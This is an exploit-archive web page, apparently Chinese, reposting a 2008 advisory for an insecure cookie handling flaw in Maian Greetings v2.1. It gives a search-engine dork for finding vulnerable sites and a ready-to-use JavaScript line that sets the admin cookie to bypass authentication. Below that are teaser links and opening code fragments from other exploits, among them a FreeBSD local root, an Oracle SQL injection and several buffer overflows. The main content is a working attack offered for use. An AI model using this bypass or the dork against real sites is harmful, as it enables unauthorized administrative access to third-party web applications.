Maian Greetings 2.1 Insecure Cookie Handling Vulnerability

所属分类：网络安全 / Exploit 阅读数： 173

收藏 0赞 0分享

Author: Saime
Date: July 12, 2008
Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Powered by: Maian Greetings v2.1

Description:
Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie,
equals admin username.

Exploit:
javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/"

更多精彩内容其他人还在看

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

<a name="upload-file"></a><h2>WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD</h2> <h3>S

收藏 0赞 0分享

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

<?php //////////////////////////////////////////////////////////////////////// // _ _ _

收藏 0赞 0分享

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

// ejecsploit.c - local root exploit for bsd's eject.c // harry // vuln found by kokanin (you 31337!!! ;)) // thanks to sacrin

收藏 0赞 0分享

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

#!/usr/bin/perl # # Remote Oracle KUPM$MCP.MAIN exploit (10g) # # Grant or revoke dba permission to unprivileged user # #

收藏 0赞 0分享

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field b

收藏 0赞 0分享

MS Internet Explorer Recordset Double Free Memory Exploit

<HTML> <!-- ********************************************************************************** Microsoft Internet Explo

收藏 0赞 0分享

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

#!/usr/bin/python # Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability # was discovered by h07 and a POC for wi

收藏 0赞 0分享

Linux Kernel

/* Linux Kernel DCCP Memory Disclosure Vulnerability Synopsis: The Linux kernel is susceptible to a locally exploitable flaw w

收藏 0赞 0分享

MS Internet Explorer (FTP Server Response) DoS Exploit

#!/usr/bin/perl # MS 07-016 FTP Server Response PoC # Usage: ./ms07016ftp.pl [LISTEN_IP] # # Tested Against: MSIE 6.0290

收藏 0赞 0分享

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

#!/usr/bin/python # MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit # Bug discovered by Krystia

收藏 0赞 0分享

Maian Greetings 2.1 Insecure Cookie Handling Vulnerability

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

MS Internet Explorer Recordset Double Free Memory Exploit

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

Linux Kernel

MS Internet Explorer (FTP Server Response) DoS Exploit

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

网络赚钱

站长故事